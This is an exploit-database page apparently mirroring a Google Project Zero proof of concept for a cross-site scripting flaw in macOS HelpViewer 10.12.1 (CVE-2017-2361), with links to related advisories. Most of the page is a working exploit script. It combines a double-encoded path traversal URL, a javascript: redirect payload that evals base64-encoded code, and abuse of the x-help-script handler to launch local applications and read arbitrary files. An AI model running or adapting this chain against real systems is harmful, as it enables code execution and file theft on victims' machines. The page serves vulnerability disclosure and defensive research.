Lucene search
Google Security Research1337DAY-ID-27109HistoryFeb 24, 2017 - 12:00 a.m.
macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read Exploit
2017-02-2400:00:00
Google Security Research
0day.today
28
0.263 Low
EPSS
Percentile
96.3%
Google Security Research
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
-->
<script>
/*
OSX: HelpViewer XSS leads to arbitrary file execution and arbitrary file read.
HelpViewer is an application and using WebView to show a help file.
You can see it simply by the command:
open /Applications/Safari.app/Contents/Resources/Safari.help
or using "help:" scheme:
help:openbook=com.apple.safari.help
help:///Applications/Safari.app/Contents/Resources/Safari.help/Contents/Resources/index.html
HelpViewer's WebView has an inside protocol handler "x-help-script" that could be used to open an arbitrary local file. Therefore if we can run arbitrary Javascript code, we'll win easily and, of course, we can read an arbitrary local file with a XMLHttpRequest.
HelpViewer checks whether the path of the url is in a valid help file or not. But we can bypass this with a double encoded "../".
PoC:
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=javascript%253adocument.write(1)";
The attached poc will pop up a Calculator.
Tested on macOS Sierra 10.12.1 (16B2659).
*/
function main() {
function second() {
var f = document.createElement("iframe");
f.onload = () => {
f.contentDocument.location = "x-help-script://com.apple.machelp/scpt/OpnApp.scpt?:Applications:Calculator.app";
};
f.src = "help:openbook=com.apple.safari.help";
document.documentElement.appendChild(f);
}
var url = "javascript%253aeval(atob('" + btoa(second.toString()) + "'));\nsecond();";
document.location = "help:///Applications/Safari.app/Contents/Resources/Safari.help/%25252f..%25252f..%25252f..%25252f..%25252f..%25252f..%25252f/System/Library/PrivateFrameworks/Tourist.framework/Versions/A/Resources/en.lproj/offline.html?redirect=" + url;
}
main();
</script>
# 0day.today [2018-01-03] #Related
prion
prion
Cross site scripting
2017-02-20 08:59:00
cve
cve
CVE-2017-2361
2017-02-20 08:59:00
seebug
seebug
nessus
nessus
Mac OS X 10.x < 10.12.3 Multiple Vulnerabilities
2017-02-01 00:00:00
macOS 10.12.x < 10.12.3 Multiple Vulnerabilities
2017-01-24 00:00:00
openvas
openvas
Apple Mac OS X Multiple Vulnerabilities-02 (Feb 2017)
2017-02-28 00:00:00
apple
apple
About the security content of macOS Sierra 10.12.3 - Apple Support
2017-03-28 11:17:25
About the security content of macOS Sierra 10.12.3
2017-01-23 00:00:00